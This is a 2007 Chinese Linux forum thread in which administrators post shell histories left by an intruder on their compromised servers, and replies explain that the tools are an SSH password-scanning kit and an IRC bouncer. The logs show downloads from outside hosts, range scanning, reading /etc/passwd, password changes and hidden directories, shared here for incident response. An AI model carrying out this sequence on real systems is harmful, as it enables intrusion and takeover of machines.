论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2007-07-28 19:38 |只看该作者 |倒序浏览

244  w
  245  passwd
  246  ps x
  247  cd /home
  248  ls -a
  249  cd /var
  250  ls -a
  251  cd /var/tmp
  252  ls -a
  253  wget
  254  id
  255  uname -a
  256  cat /proc/cpuinfo
  257  wget www.geocities.com/webhackro/unixcod.tar.gz
  258  tar xzvf unixcod.tar.gz
  259  rm -rf unixcod.tar.gz
  260  cd unixcod
  261  ./unix 210.56
  262  ./unix 210.57
  263  ./unix 210.58
  264  cd ..
  265  ls -a
  266  wget al-ex.ws43.com/psybnc/psybnc-linux.tgz
  267  tar xzvf psybnc-linux.tgz
  268  rm -rf psybnc-linux.tgz
  269  cd psybnc
  270  ./psybnc
  271  cd /var/tmp
  272  ls -a
  273  cd psybnc
  274  pico psybnc.conf
  275  nano psybnc.conf
  276  cd ..
  277  tar -czvf psybnc
  278  tar
  279  tar --help
  280  ls -a
  281  tar -czvf psybnc
  282  tar -cxzvf psybnc
  283  tar -czvf psybnc.tgz psybnc
  284  ls -a
  285  ftp tomygunxxx.go.ro
  286  ftp 70.96.185.13
  287  exit
  288  w
  289  cd /var/tmp
  290  ls -a
  291  cd psybnc
  292  pico psybnc.conf
  293  nano psybnc.conf
  294  ./psybnc

文库|博客

第二场雪

丰衣足食

论坛徽章:: 0

2楼 [报告]

发表于 2007-07-29 00:07 |只看该作者

这人不好....

unixcod好象是个扫描ssh口令的工具包

你还是检查下系统吧

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

yoolive

白手起家

论坛徽章:: 0

3楼 [报告]

发表于 2007-10-26 12:52 |只看该作者

我也被用同样的手法攻击了

此人使用的hack工具比较新，我正在研究 http://infected.atlasconstructionrestoration.com/ 这里好像是这次使用工具的源头，使用方法目前没公开，IRC黑客频道应该有交流，过几天研究明白了，给你消息。呵呵，不过肯定的一点是你的机器已经是成为发动DDOS攻击的僵尸了。

以下是流氓黑客留下的,看看他在我的机器上留下了什么.

uname -a
w
passwd
cd /var/tmp
ls -a
cd " "
ls -a
ps x
last
cd /var/tmp
cd " "
mkdir " "
ls -a
cat /proc/cpuinfo
cd /var/tmp
cd " "
wget chicka.as.ro/ch.jpg
ls -a
rm -rf ch.jpg
wget bazilutzu.ueuo.com/usa.tar
w
uptime
ls -all
ps -aux
cat /etc/passd
cat /etc/passwd
passwd netdump
passwd
passwd postgres
passwd tom.zhang
passwd ggh
cd /var/tmp
ls -a
cd /tmp
ls -a
cd /dev/shm
ls -a
cd /home
ls -a
cd zzz
ls -a
pico .eggcups
nano .eggcups
nano cd /dev/shm
cd /dev/shm
wget www12.asphost4free.com/hackroot/psybnc-linux.tgz
tar -xzvf psybnc-linux.tgz
cd psybnc-linux
chmdo +x *
chmod +x *
ls -a
cd psybnc
chmod +x *
ls -a
pico psybnc.conf
nano psybnc.conf
./psybnc
w
ps x
w
last -u root
cat /proc/cpuinfo

[ 本帖最后由 yoolive 于 2007-10-26 12:53 编辑 ]

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

kingp999

稍有积蓄

论坛徽章:: 0

4楼 [报告]

发表于 2007-10-29 11:04 |只看该作者

并非好人
当心你的服务器已经被别人搞定
UNIXCOD是一个密码破解工具
里面有一个密码字典

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

hongling1122

稍有积蓄

论坛徽章:: 0

5楼 [报告]

发表于 2007-11-01 12:59 |只看该作者

貌似入侵……有问题！！！！！

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

fsm11

丰衣足食

论坛徽章:: 0

6楼 [报告]

发表于 2007-11-01 16:08 |只看该作者

原帖由 yoolive 于 2007-10-26 12:52 发表
此人使用的hack工具比较新，我正在研究 http://infected.atlasconstructionrestoration.com/ 这里好像是这次使用工具的源头，使用方法目前没公开，IRC黑客频道应该有交流，过几天研究明白了，给你消息。呵呵，不 ...

这个只是利用你的机器作为一个跳板来攻击其他的机器。